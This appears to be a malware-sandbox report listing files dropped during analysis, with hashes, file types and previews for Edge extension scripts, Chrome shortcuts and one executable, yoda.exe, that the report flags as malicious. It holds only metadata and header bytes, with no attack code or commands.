MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4882)
Category:	dropped
Size (bytes):	122218
Entropy (8bit):	5.439997574414675
Encrypted:	false
SSDEEP:	1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
MD5:	67C4451398037DD1C497A1EA98227630
SHA1:	F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
SHA-256:	59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
SHA-512:	17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4882)
Category:	dropped
Size (bytes):	130866
Entropy (8bit):	5.425065147784983
Encrypted:	false
SSDEEP:	1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
MD5:	1A8A1F4E5BA291867D4FA8EF94243EFA
SHA1:	B25076D2AE85BD5E4ABA935F758D5122CCB82C36
SHA-256:	441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
SHA-512:	F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

C:\Users\user\AppData\Local\Temp\scoped_dir6204_2063217559\7ccf8629-d600-479d-935b-c4e4c1e13334.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir6204_2063217559\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir6204_2063217559\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir6204_2063217559\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir6204_2063217559\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\yoda.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	853528
Entropy (8bit):	7.972615296085439
Encrypted:	false
SSDEEP:	12288:y0gQY86Y8R5WhfO/3DeOWyE5CStQNN+GUOWVL5mwE/oN615/62K2:9lY86Y0Whm/Sby/iLGprwUO2K2
MD5:	79884836C406AE143BC31AEADFA81E70
SHA1:	3A38F9B4CF9FC75A0B6EC34230E431E0C4B7C1A2
SHA-256:	47D48F2753F7EAB065480D9B125C1429A7943ED1FBB408E3076D7A3E3102BD0C
SHA-512:	1A566B38E8668FC932ADA37462D099B7494FDBEDB38B113A2644B67652D85BA3BA784892F5989017E2889562A1E535DB9BFD43E63F27DB6D4871BD014EB0B66A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................P......L0....@.................................@............;..............H....`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....;.......<..................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:09:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.975809307799012
Encrypted:	false
SSDEEP:	48:8mdaTmWfIHaZidAKZdA19ehwiZUklqehey+3:8fTfJty
MD5:	EABB495373C3EFF1E76D556D122E3577
SHA1:	05C10EDF29AE9574F0E35718619EA01866ADD79F
SHA-256:	FF67D02622523070C3111427B9B0DE9363FA47AC16D3AAD30DCE929D46E572D4
SHA-512:	C1E44F74B095D908D2AEE1E24C9BA66F7CF825DDBDCE723CA569FFACC832F2C1D49FBD5F622688B81B7920D58E5044BE4B0BDC3C86B856579972515839E86656
Malicious:	false
Preview:	L..................F.@.. ...$+.,....6...%X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y<1....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y<1....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y<1....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y<1..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y@1...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.o......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:09:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9890170115175443
Encrypted:	false
SSDEEP:	48:8kdaTmWfIHaZidAKZdA1weh/iZUkAQkqehdy+2:8JTfb9Q0y
MD5:	8415FC5C13B8A0691915EF426FE6DDBF
SHA1:	DD18D764F42CDBC3ECD9C1CAD8F3829BDDD3186A
SHA-256:	A00864F0F7EDB976E5EE668B94DC6B3C2A122640F8A20F87A161CD68DCBC9C1E
SHA-512:	F715481DEC62DC38EEAA1A18B1D0DC7FA251FF742486A2B7B7B8EF932816110770B1CE4146F54BF9075E90379A53314CCE52D8C1EC5C44DBC075F099C12EE911
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....E..%X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y<1....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y<1....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y<1....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y<1..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y@1...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.o......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.003362502304361
Encrypted:	false
SSDEEP:	48:8xDdaTmWfsHaZidAKZdA14tseh7sFiZUkmgqeh7s7y+BX:8xETfnnRy
MD5:	9B76D5B971EAAA61E5F83E077B3B3C08
SHA1:	9E36C85CD72D1D403E69BF38AC51DB33B2371573
SHA-256:	888367C091377B611F4468B9CFF38A1D7F42A033745065BFD27FC6063B6DB708
SHA-512:	1DB838E73B4B33532A21E7C755F7F05C254E67C36E7BE814231FB0989358ADCC3BB2E611C26A94C8FB17EF6822B909C3B9056F179439D2046209B4BA2AECF01C
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y<1....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y<1....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y<1....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y<1..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.o......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:09:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.989096337166263
Encrypted:	false
SSDEEP:	48:8TdaTmWfIHaZidAKZdA1vehDiZUkwqehZy+R:8UTf4jy
MD5:	A2A4839686CF0F7E33EF5E7CA1CC3993
SHA1:	313C771FE3494F932EFCC6CBB612D7923A4DE45B
SHA-256:	1392F2252F0CE94E0271CA0411C0B53E3D8C7CBEDCFFF9CA592C8D9505650FC3
SHA-512:	CFCBAD0D9BE546CB70DB7C0120D46F845BFE75EBD0F6FC204BFD0D8D65D68A38DBA81D794161FBF88C6B123F4DB91195FC49F94C56113EA16ED24690BBD252DD
Malicious:	false
Preview:	L..................F.@.. ...$+.,....$w..%X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y<1....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y<1....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y<1....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y<1..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y@1...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.o......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:09:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9789414737547433
Encrypted:	false
SSDEEP:	48:82daTmWfIHaZidAKZdA1hehBiZUk1W1qeh/y+C:8vTfo9fy
MD5:	43E1CE204D56F21B1E4D6F0AC9CD5AB4
SHA1:	6933EB35B982598C433182F55EE5F67D680EAB9D
SHA-256:	7FC6E49412B50F867AB99A1BCD06607A4CF7FAAF4503F7E9EFC840CE7D226207
SHA-512:	87B9CD85B35A683AF6AA007312BF50FB73E5877C7EB274911A2BC23E97DCE86D7C32532D498750EDD661176EFA3533F82AE8D3C47599D830A3C50307542FC7F4
Malicious:	false
Preview:	L..................F.@.. ...$+.,........%X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y<1....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y<1....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y<1....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y<1..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y@1...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.o......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:09:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9878123317893506
Encrypted:	false
